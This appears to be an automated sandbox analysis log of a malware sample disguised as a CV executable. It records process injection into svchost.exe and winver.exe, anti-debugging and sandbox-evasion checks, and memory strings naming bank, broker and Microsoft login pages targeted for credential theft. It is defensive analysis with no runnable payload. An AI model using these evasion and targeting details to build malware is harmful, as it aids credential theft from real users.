                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DE01E LoadLibraryA,GetProcAddress,0_2_000DE01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E6B05 push ecx; ret 0_2_000E6B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411948 push ss; retf 2_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040214C pushad ; retf 2_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AAC push esp; retf 2_2_00416AAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413B33 pushfd ; ret 2_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033E0 push eax; ret 2_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144FC push edi; retf 2_2_004144FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415D23 push 00000009h; retn 3081h2_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408695 push edx; retf 2_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004086AF push edx; retf 2_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046909AD push ecx; mov dword ptr [esp], ecx5_2_046909B6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C237 push eax; iretd 5_2_0036C238
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C25C push esp; retf 5_2_0036C265
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035E310 push esi; ret 5_2_0035E317
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035E565 push ss; retf 5_2_0035E56B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00360750 pushfd ; ret 5_2_00360796
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003708C4 pushfd ; ret 5_2_003708CF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00362940 push 00000009h; retn 3081h5_2_003629E1
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003552B2 push edx; retf 5_2_003552CB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003552CC push edx; retf 5_2_003552CB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003636C9 push esp; retf 5_2_003636CA
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437C63C push ss; ret 5_2_0437C647
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_043706BB push eax; ret 5_2_043706D8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437C738 push FFFFFFC5h; iretd 5_2_0437C73A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04376025 push ss; ret 5_2_04376026
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437BEBC push es; iretd 5_2_0437BEC2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04374960 pushad ; retf 5_2_04374962
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437694C push ecx; ret 5_2_0437694D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04375A15 push edi; ret 5_2_04375A16
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04376ACC push edx; retf 5_2_04376AD4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00128111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00128111
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000DEB42
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E123A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI/Special instruction interceptor: Address: 1B278E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 1876Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 8097Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-94764
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-95835
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95304
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep count: 1876 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep time: -3752000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep count: 8097 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7136Thread sleep time: -16194000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe TID: 6200Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00106CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00106CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001060DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001063F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0010EB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010F56F FindFirstFileW,FindClose,0_2_0010F56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0010F5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00111B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00111C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00111F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C740 FindFirstFileW,FindNextFileW,FindClose,5_2_0036C740
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000DDDC0
                Source: 341G64J42.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 341G64J42.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 341G64J42.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: winver.exe, 00000005.00000002.4529420026.0000000007667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,116964286555a
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 341G64J42.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 341G64J42.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 341G64J42.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4525135369.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: 341G64J42.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 341G64J42.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 341G64J42.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 341G64J42.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 341G64J42.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 341G64J42.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A46000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2692018697.000002E63E81C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 341G64J42.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 341G64J42.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 341G64J42.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 341G64J42.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 341G64J42.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 341G64J42.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 341G64J42.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 341G64J42.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 341G64J42.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: winver.exe, 00000005.00000002.4529420026.0000000007667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtual_card_usage_datapageVMware20,116964286555a
                Source: 341G64J42.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 341G64J42.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 341G64J42.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 341G64J42.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 341G64J42.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 341G64J42.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 341G64J42.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe API call chain: ExitProcess graph end node graph_0-94518
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\winver.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417A83 LdrLoadDll,2_2_00417A83
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_00116AAF BlockInput,0_2_00116AAF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_000C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000C3D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_000F3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_000F3920
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_000DE01E LoadLibraryA,GetProcAddress,0_2_000DE01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_01B26550 mov eax, dword ptr fs:[00000030h] 0_2_01B26550
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_01B27BB0 mov eax, dword ptr fs:[00000030h] 0_2_01B27BB0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_01B27B50 mov eax, dword ptr fs:[00000030h] 0_2_01B27B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
